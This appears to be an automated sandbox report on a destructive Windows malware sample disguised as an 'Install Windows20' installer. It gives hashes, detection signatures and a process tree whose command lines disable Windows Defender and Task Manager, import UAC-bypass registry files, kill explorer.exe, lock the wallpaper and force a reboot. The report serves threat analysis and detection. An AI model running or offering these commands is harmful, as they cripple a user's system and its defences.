Overview
overview
10Static
static
7TheMalware...20.exe
windows7-x64
4TheMalware...20.exe
windows10-2004-x64
7TheMalware...om.bat
windows7-x64
1TheMalware...om.bat
windows10-2004-x64
1TheMalware...er.exe
windows7-x64
TheMalware...er.exe
windows10-2004-x64
TheMalware.../1.vbs
windows7-x64
1TheMalware.../1.vbs
windows10-2004-x64
1TheMalware...ad.exe
windows7-x64
8TheMalware...ad.exe
windows10-2004-x64
8TheMalware...os.vbs
windows7-x64
1TheMalware...os.vbs
windows10-2004-x64
1TheMalware...er.hta
windows7-x64
1TheMalware...er.hta
windows10-2004-x64
3TheMalware...r.html
windows7-x64
1TheMalware...r.html
windows10-2004-x64
1TheMalware...in.bat
windows7-x64
TheMalware...in.bat
windows10-2004-x64
TheMalware...ix.bat
windows7-x64
1TheMalware...ix.bat
windows10-2004-x64
1TheMalware...er.exe
windows7-x64
1TheMalware...er.exe
windows10-2004-x64
1TheMalware...er.exe
windows7-x64
5TheMalware...er.exe
windows10-2004-x64
5TheMalware.../o.vbs
windows7-x64
1TheMalware.../o.vbs
windows10-2004-x64
1TheMalware...op.vbs
windows7-x64
1TheMalware...op.vbs
windows10-2004-x64
TheMalware...om.vbs
windows7-x64
1TheMalware...om.vbs
windows10-2004-x64
1TheMalware...es.exe
windows7-x64
7TheMalware...es.exe
windows10-2004-x64
7Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-03-2024 20:29
Behavioral task
behavioral1
Sample
TheMalwaredev-s-garbage-main/Install Windows20.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
TheMalwaredev-s-garbage-main/Install Windows20.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
TheMalwaredev-s-garbage-main/Install Windows20/doom.bat
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
TheMalwaredev-s-garbage-main/Install Windows20/doom.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer.exe
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/1.vbs
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/1.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/dead.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/dead.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/dos.vbs
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/dos.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.hta
Resource
win7-20240220-en
Behavioral task
behavioral14
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.hta
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.html
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.html
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/matrix.bat
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/matrix.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral21
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/melter.exe
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/melter.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/mover.exe
Resource
win7-20240220-en
Behavioral task
behavioral24
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/mover.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral25
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/o.vbs
Resource
win7-20240221-en
Behavioral task
behavioral26
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/o.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/op.vbs
Resource
win7-20240221-en
Behavioral task
behavioral28
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/op.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral29
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/random.vbs
Resource
win7-20240221-en
Behavioral task
behavioral30
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/random.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral31
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/res.exe
Resource
win7-20240221-en
Behavioral task
behavioral32
Sample
TheMalwaredev-s-garbage-main/Install Windows20/installer/res.exe
Resource
win10v2004-20240226-en
Errors
General
-
Target
TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat
-
Size
3KB
-
MD5
5f54a2c61397eb3d4f1bc8e9736fec2a
-
SHA1
5c3ad25b0bff96ad74d2743b15089847d6be2d40
-
SHA256
9995fab89f303652abc14b153ea864d9a5e39e20c8077d165e9944948eeeb968
-
SHA512
d7c84ac92cb35aca9fb4c2e7bb43924e5033ad49a9b4fcee320386a5d0bfddf2ec674e33a575c0848b9d274bebeb4dc9abca0360493c968bbc29c7a09438141f
Malware Config
Signatures
-
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" reg.exe -
Disables Task Manager via registry modification
-
Processes:
resource yara_rule behavioral17/memory/2484-275-0x0000000000400000-0x0000000000410000-memory.dmp upx C:\Users\Public\Desktop\setup3.exe upx behavioral17/memory/2656-338-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral17/memory/2484-337-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral17/memory/2732-342-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral17/memory/2488-341-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral17/memory/2628-340-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral17/memory/2572-339-0x0000000000400000-0x0000000000410000-memory.dmp upx -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral17/memory/2880-176-0x0000000140000000-0x0000000140126000-memory.dmp autoit_exe behavioral17/memory/2880-178-0x0000000140000000-0x0000000140126000-memory.dmp autoit_exe behavioral17/memory/2880-344-0x0000000140000000-0x0000000140126000-memory.dmp autoit_exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Public\\temp\\noescape.bmp" reg.exe -
Drops file in Windows directory 15 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\Web\NO.exe cmd.exe File created C:\Windows\winhelper.vbs cmd.exe File created C:\Windows\Web\Screen\154.exe cmd.exe File opened for modification C:\Windows\SAVEYOURSELF.vbs cmd.exe File opened for modification C:\Windows\Web\setup64.exe cmd.exe File created C:\Windows\WinKernel32.bat cmd.exe File opened for modification C:\Windows\updatepush.exe cmd.exe File created C:\Windows\SAVEYOURSELF.vbs cmd.exe File created C:\Windows\Web\NO.exe cmd.exe File created C:\Windows\Web\setup64.exe cmd.exe File opened for modification C:\Windows\WinKernel32.bat cmd.exe File created C:\Windows\Web\you cant escape.exe cmd.exe File opened for modification C:\Windows\Web\you cant escape.exe cmd.exe File created C:\Windows\updatepush.exe cmd.exe File opened for modification C:\Windows\winhelper.vbs cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2472 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1840 taskkill.exe -
Modifies registry class 19 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\Handler = "{ceefea1b-3e29-4ef1-b34c-fec79c4f70af}" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{00021500-0000-0000-C000-000000000046}\ = "{00021401-0000-0000-C000-000000000046}" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\IconPath = "%SystemRoot%\\system32\\shell32.dll,-16769" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\ItemName = "@shell32.dll,-30397" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}\ = "{00021401-0000-0000-C000-000000000046}" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "xxx" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214EE-0000-0000-C000-000000000046}\ = "{00021401-0000-0000-C000-000000000046}" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{00021500-0000-0000-C000-000000000046} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1} reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\MenuText = "@shell32.dll,-30318" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\Config\DontRename reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214EE-0000-0000-C000-000000000046} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214F9-0000-0000-C000-000000000046} reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\NullFile reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214F9-0000-0000-C000-000000000046}\ = "{00021401-0000-0000-C000-000000000046}" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\Config reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
Processes:
x.exex.exex.exex.exex.exex.exepid process 2484 x.exe 2488 x.exe 2628 x.exe 2572 x.exe 2732 x.exe 2656 x.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
taskkill.exeshutdown.exedescription pid process Token: SeDebugPrivilege 1840 taskkill.exe Token: SeShutdownPrivilege 1796 shutdown.exe Token: SeRemoteShutdownPrivilege 1796 shutdown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exedescription pid process target process PID 2000 wrote to memory of 1840 2000 cmd.exe taskkill.exe PID 2000 wrote to memory of 1840 2000 cmd.exe taskkill.exe PID 2000 wrote to memory of 1840 2000 cmd.exe taskkill.exe PID 2000 wrote to memory of 2496 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2496 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2496 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2472 2000 cmd.exe timeout.exe PID 2000 wrote to memory of 2472 2000 cmd.exe timeout.exe PID 2000 wrote to memory of 2472 2000 cmd.exe timeout.exe PID 2000 wrote to memory of 2248 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2248 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2248 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2956 2000 cmd.exe rundll32.exe PID 2000 wrote to memory of 2956 2000 cmd.exe rundll32.exe PID 2000 wrote to memory of 2956 2000 cmd.exe rundll32.exe PID 2000 wrote to memory of 2236 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2236 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2236 2000 cmd.exe reg.exe PID 2000 wrote to memory of 1804 2000 cmd.exe reg.exe PID 2000 wrote to memory of 1804 2000 cmd.exe reg.exe PID 2000 wrote to memory of 1804 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2016 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2016 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2016 2000 cmd.exe reg.exe PID 2000 wrote to memory of 1796 2000 cmd.exe reg.exe PID 2000 wrote to memory of 1796 2000 cmd.exe reg.exe PID 2000 wrote to memory of 1796 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2720 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2720 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2720 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2780 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2780 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2780 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2640 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2640 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2640 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2804 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2804 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2804 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2824 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2824 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2824 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2820 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2820 2000 cmd.exe reg.exe PID 2000 wrote to memory of 2820 2000 cmd.exe reg.exe PID 2000 wrote to memory of 348 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 348 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 348 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 1596 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 1596 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 1596 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 588 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 588 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 588 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2304 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2304 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2304 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2880 2000 cmd.exe mover.exe PID 2000 wrote to memory of 2880 2000 cmd.exe mover.exe PID 2000 wrote to memory of 2880 2000 cmd.exe mover.exe PID 2000 wrote to memory of 2172 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2172 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2172 2000 cmd.exe WScript.exe PID 2000 wrote to memory of 2792 2000 cmd.exe WScript.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\main.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\update.vbs"2⤵PID:2496
-
-
C:\Windows\system32\timeout.exetimeout 202⤵
- Delays execution with timeout.exe
PID:2472
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Public\temp\noescape.bmp /f2⤵
- Sets desktop wallpaper using registry
PID:2248
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters2⤵PID:2956
-
-
C:\Windows\system32\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:2236
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoTrayItemsDisplay" /t REG_DWORD /d "1" /f2⤵PID:1804
-
-
C:\Windows\system32\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 12⤵
- Modifies registry key
PID:2016
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoPinningToTaskbar" /t REG_DWORD /d "1" /f2⤵PID:1796
-
-
C:\Windows\system32\reg.exereg import virus.reg2⤵PID:2720
-
-
C:\Windows\system32\reg.exereg import here.reg2⤵
- UAC bypass
PID:2780
-
-
C:\Windows\system32\reg.exereg import death.reg2⤵PID:2640
-
-
C:\Windows\system32\reg.exereg import no.reg2⤵
- UAC bypass
PID:2804
-
-
C:\Windows\system32\reg.exereg import password.reg2⤵PID:2824
-
-
C:\Windows\system32\reg.exereg import color.reg2⤵PID:2820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:1596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:588
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\mover.exemover.exe2⤵PID:2880
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:2172
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:2792
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:2076
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"2⤵PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exex.exe2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2484 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F6CD.tmp\x.cmd""3⤵PID:684
-
-
-
C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exex.exe2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2488 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F68F.tmp\x.cmd""3⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exex.exe2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2628 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AE.tmp\x.cmd""3⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exex.exe2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2572 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AF.tmp\x.cmd""3⤵PID:704
-
-
-
C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exex.exe2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2732 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F69E.tmp\x.cmd""3⤵PID:1936
-
-
-
C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exex.exe2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2656 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F6B0.tmp\x.cmd""3⤵PID:1756
-
-
-
C:\Windows\system32\reg.exereg import im.reg2⤵PID:3028
-
-
C:\Windows\system32\reg.exereg import systemmessage.reg2⤵
- UAC bypass
PID:1368
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:1944
-
-
C:\Windows\system32\reg.exereg import UAC.reg2⤵
- UAC bypass
PID:2008
-
-
C:\Windows\system32\reg.exereg import inkfile.reg2⤵
- Modifies registry class
PID:2024
-
-
C:\Windows\system32\shutdown.exeshutdown /r /t 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2824
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2296
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
385B
MD51ebb3ddb5424eae8205a111a3b4e2237
SHA17f6603ae0410ea2dc5adfd879632039b0eee955a
SHA256efc4f3065ab66661a92daebbf770103b2e8306d3985ac5c5ae816e0f64e6ab4e
SHA512cc9d3d208f97f8f9f46865ce75257cff6616e49f49b90e1273fa923c1d7c05c68e0ea35eec3361de4167839acec86e03c40cf4f1bf7bb039ec91cd4f8e3c855f
-
Filesize
76B
MD55156c0df260ccc7bc13b73b6de4d9a25
SHA1e6f8b1f6ef658a1f5772b83c898088330184d291
SHA256565850ac8c04867b561958ea678143b383499e729aebace9c84bec0484772b88
SHA512d2e7d791e6ccbf6389659d4fa673bbbb837a8ccbdfec287ff6a5d8a385e9aad413d692bc5cf93cae4d8292f565a7e9ddcc437da97a9b5fdd0c4526c4ca69cc39
-
Filesize
23B
MD523873c064655ec26585bb489cab1965c
SHA1575d47d57ddb6ffb5335f5d48f6bd222e17af599
SHA256828653c66fd126cb9f30a8fc566887d3ae54376ccba637101ae8e0889a6a3b63
SHA51244517e1b3e6ba403d99e3ae6d9340ea3e856a50e4bec3740d3530d066f28677b78ea2a25ebf63df948469dde04547044483bb9d37a5cf79e8b3ea3544bfaf348
-
Filesize
182B
MD581c5f570e4fb185d0d675c450741f28b
SHA1cc7c042a8ec903ea5fd4171ffa2dfe57e8a5586a
SHA2560c32196e293badc8b917f22ecf9d746c631678a15704dc829d594e1e04f01376
SHA5122434226097e83942ddade8a98efaa2d912f8030180729fd6ccedbe70091d262a8d1ac080ae41a6c5ac37c4303c79bbdea8d6fa86828759651536532cb2fa5936
-
Filesize
22KB
MD59d0cbe0006b8e6760679bf893c5d848f
SHA1a85c9378a962f1f3454ec34ce596dea318031618
SHA25641bb8333a815138ccdc1809c33d3263d67834b2493c6b8eeebd5dde3d1ffe20c
SHA51213f513d75235da33bb032901b506c718cece2f7f9d0fbe4bd9d3508f9efca208b10a319b130ec98327b6c5e054abcf7d052ce3e672f2c1c38bac1c162d4358e2
-
Filesize
37B
MD5ac910281f16a464b6257102b715ffafc
SHA1590add7ed48a1d5fa78093812ef88f9d0dfbb7c5
SHA256afb4e7e0f799d76ec4b197427b0933935eddd933baf6379875b3c37eb6b1bc6e
SHA512a62b9363acf0628ec373a33409f13e161779f0d28b0dd163b53d4ec9135b172e68c10dfb37a5459e51ec636ff3e23cc17de4a846d273e5a3e9149abe41a806ad
-
Filesize
113B
MD5284e7e79635ec15370bb7530d20f6b7e
SHA1471f6b7bc91a8c6b51f291c75126a38b082a92ce
SHA2564d81298082414e092ccb0dab56007df80a1930b60315a5b759bf1d10d8c11235
SHA5123bcbce046df39bf285a2e63f83374fc0c6b809b4ee5091744496244b5929753f102402c87671205ae9b7caa78b12328cabfae1523fe6abbc5abd6e66cae57e24
-
Filesize
128KB
MD527d4d788b5190d8ad943f03479c86360
SHA15ca05ed08987ade8d20a9e1bd3d7245d9b3ef4e7
SHA2562d3586f1ce37337292ac4b3ece03ab78b3aa5c28a5925d7d498d35ca32434993
SHA512c55a8819dc3285d655c2033e98e47db6397654ad1aee6a22e8ac50d8b6cb11b8eb41a59a6aee5bce1a784167894f4664b0ad390110e94013a19d221a9cfba02e